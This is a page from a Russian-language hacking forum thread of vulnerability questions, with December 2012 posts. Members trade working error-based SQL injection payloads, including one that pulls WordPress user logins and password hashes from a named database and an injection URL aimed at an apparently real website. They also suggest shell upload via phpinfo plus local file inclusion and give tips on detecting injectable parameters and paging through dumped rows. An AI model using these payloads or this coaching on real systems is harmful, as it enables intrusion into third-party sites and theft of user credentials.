HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2183 из 2438 « Первая < 11831683208321332173 2179 2180 2181 2182 2183 2184 2185 2186 2187 219322332283 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #21821  
Старый 15.12.2012, 19:01
Prosta4ok
Guest
Сообщений: n/a
Провел на форуме:
19438

Репутация: 0
По умолчанию
Цитата:
Сообщение от beBoss  
beBoss said:
Код:
Code:
http://cs.man1a.com/e107_files/cache/phpinfo.php
уязвимы?
кто?
 
Ответить с цитированием

  #21822  
Старый 15.12.2012, 19:05
beBoss
Guest
Сообщений: n/a
Провел на форуме:
8271

Репутация: 0
По умолчанию
Заливка шелла через phpinfo + LFI
 
Ответить с цитированием

  #21823  
Старый 15.12.2012, 19:18
Prosta4ok
Guest
Сообщений: n/a
Провел на форуме:
19438

Репутация: 0
По умолчанию
Цитата:
Сообщение от beBoss  
beBoss said:
Заливка шелла через phpinfo + LFI
ну если на сайте есть LFI то да
 
Ответить с цитированием

  #21824  
Старый 15.12.2012, 22:10
FunOfGun
Guest
Сообщений: n/a
Провел на форуме:
109228

Репутация: 124
По умолчанию
Как можно с высокой долей вероятности определить наличие SQLi? В данный момент подставляю'%20group%20by%201%20-- во все параметры, а потом '%20group%20by%201000%20--, поидее если парамет текстовый и есть скуля будет разница в размере(в данный момент скрипт считает, что есть скуля при разнице в 500 байт, это нормальная чувствительность?) страницы. Жизнеспособный подход? Или может есть вариант лучше? Заранее спасибо.
 
Ответить с цитированием

  #21825  
Старый 15.12.2012, 22:17
blesse
Guest
Сообщений: n/a
Провел на форуме:
29647

Репутация: 1
По умолчанию
Ребят помогите разобрать запрос :

нужно чтоб выводил (user_login,0x7e,user_pass) where+ID=1

никак не разберу.

Ну или хотяб подскажите прогу или сервисы чтоб значения символов самими символави заменял(%20=+ %28=( %29=) и т.д.)

1%20and%28select%201%20from%28select%20count%28*%2 9%2Cconcat%28%28select%20%28select%20%28select%20c oncat%280x27%2C0x7e%2Cwp_users.user_pass%2C0x27%2C 0x7e%29%20from%20%60kazachstan%60.wp_users%20Order %20by%20user_login%20limit%200%2C1%29%20%29%20from %20%60information_schema%60.tables%20limit%200%2C1 %29%2Cfloor%28rand%280%29*2%29%29x%20from%20%60inf ormation_schema%60.tables%20group%20by%20x%29a%29% 20and%201%3D1
 
Ответить с цитированием

  #21826  
Старый 16.12.2012, 00:24
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию
Цитата:
Сообщение от FunOfGun  
FunOfGun said:
Как можно с высокой долей вероятности определить наличие SQLi? В данный момент подставляю
'%20group%20by%201%20--
во все параметры, а потом
'%20group%20by%201000%20--
, поидее если парамет текстовый и есть скуля будет разница в размере(в данный момент скрипт считает, что есть скуля при разнице в 500 байт, это нормальная чувствительность?) страницы. Жизнеспособный подход? Или может есть вариант лучше? Заранее спасибо.
А если %20 фильтруется ? А если -- ?? А если group by ?

Абсолютно неверный подход имхо.

Цитата:
Сообщение от None  
Ну или хотяб подскажите прогу или сервисы чтоб значения символов самими символави заменял(%20=+ %28=( %29=) и т.д.)
notepad.exe - Win+R - Заменить (%20) на (+)

Аналогично всё остальное
 
Ответить с цитированием

  #21827  
Старый 16.12.2012, 00:36
FunOfGun
Guest
Сообщений: n/a
Провел на форуме:
109228

Репутация: 124
По умолчанию
Цитата:
Сообщение от BigBear  
BigBear said:
А если
%20
фильтруется ? А если
--
?? А если
group by
?
Абсолютно неверный подход имхо.
Угу, а какой тогда перспективнее?
 
Ответить с цитированием

  #21828  
Старый 16.12.2012, 08:16
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию
Цитата:
Сообщение от Vip77  
Vip77 said:
Как раскрутить http://www.its-my-life.ru/question.html?r=1
Именно в этом скрипте не нашел уязвимость, зато нашел тут:

Цитата:
Сообщение от None  
http://www.its-my-life.ru/article/40/1202%27+OR+%28SELECT+COUNT%28*%29+FROM+%28SELECT+1 +UNION+SELECT+2+UNION+SELECT+3%29x+GROUP+BY+CONCAT %28MID%28%28select+concat_ws%280x3a,version()%29%2 9,1,63%29+,+%20FLOOR%28RAND%280%29*2%29%29%29+--++--+%27.html
 
Ответить с цитированием

  #21829  
Старый 16.12.2012, 15:39
blesse
Guest
Сообщений: n/a
Провел на форуме:
29647

Репутация: 1
По умолчанию
Как вывести несколько строчек из бд при выводе через ошибки?

Или допустим сначал 1 потом 2

Пишу limit 0,1 выводит 1 стоку ,а пишу limit 0,2 вываливает ошибку
 
Ответить с цитированием

  #21830  
Старый 16.12.2012, 15:40
FunOfGun
Guest
Сообщений: n/a
Провел на форуме:
109228

Репутация: 124
По умолчанию
Цитата:
Сообщение от blesse  
blesse said:
Как вывести несколько строчек из бд при выводе через ошибки?
Или допустим сначал 1 потом 2
Пишу limit 0,1 выводит 1 стоку ,а пишу limit 0,2 вываливает ошибку
попробуйте limit 1,1. Должно вывести вторую, а limit 2,1 -- третью.
 
Ответить с цитированием
Ответ
Страница 2183 из 2438 « Первая < 11831683208321332173 2179 2180 2181 2182 2183 2184 2185 2186 2187 219322332283 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ